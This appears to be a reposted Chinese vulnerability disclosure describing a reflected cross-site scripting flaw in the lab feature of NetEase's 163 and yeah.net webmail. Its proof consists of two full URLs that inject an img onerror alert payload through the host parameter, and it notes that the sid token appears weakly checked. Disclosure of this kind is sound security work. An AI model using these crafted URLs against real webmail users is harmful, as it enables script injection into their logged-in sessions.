网站地图    收藏   

主页 > 后端 > 网站安全 >

网易邮箱跨站及修复方案 - 网站安全 - 自学php

来源:自学PHP网    时间:2015-04-17 13:03 作者: 阅读:

[导读] 网易系列邮箱实验室功能模块非持久型跨站~只测试了163、yeah邮箱均存在,估计其他系列的邮箱也存在。因为要用户登录情况下才触发。所以此处我把邮箱名用user代替!另外sid令牌即使...

 

网易系列邮箱实验室功能模块非持久型跨站~只测试了163、yeah邮箱均存在,估计其他系列的邮箱也存在。因为要用户登录情况下才触发。所以此处我把邮箱名用user代替!另外sid令牌即使随便给一个值可以弹框框,不知道这个令牌检查是否严格。这个也算一个漏洞吧~

漏洞证明:

 

http://lab.mail.yeah.net/labweb/lab.do?m=lab&keyfrom=jisu_new.index&sid=IBOviSNbVkMpAEsswnbbgMrCKVvNwOMz&uid=user@yeah.net&host=webmail.mail.yeah.net%22%3Cimg%20src=x%20onerror=%22alert%28/xss/%29%22/%3E&ver=js4&style=1&skin=163blue&color=005590

 


 

 

 

http://lab.mail.163.com/labweb/lab.do?m=lab&keyfrom=jisu_new.index&sid=IBOviSNbVkMpAEsswnbbgMrCKVvNwOMz&uid=user@163.com&host=webmail.mail.163.com%22%3Cimg%20src=x%20onerror=%22alert%28/xss/%29%22/%3E&ver=js4&style=1&skin=163blue&color=005590

 

 

作者Cryin@乌云

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

添加评论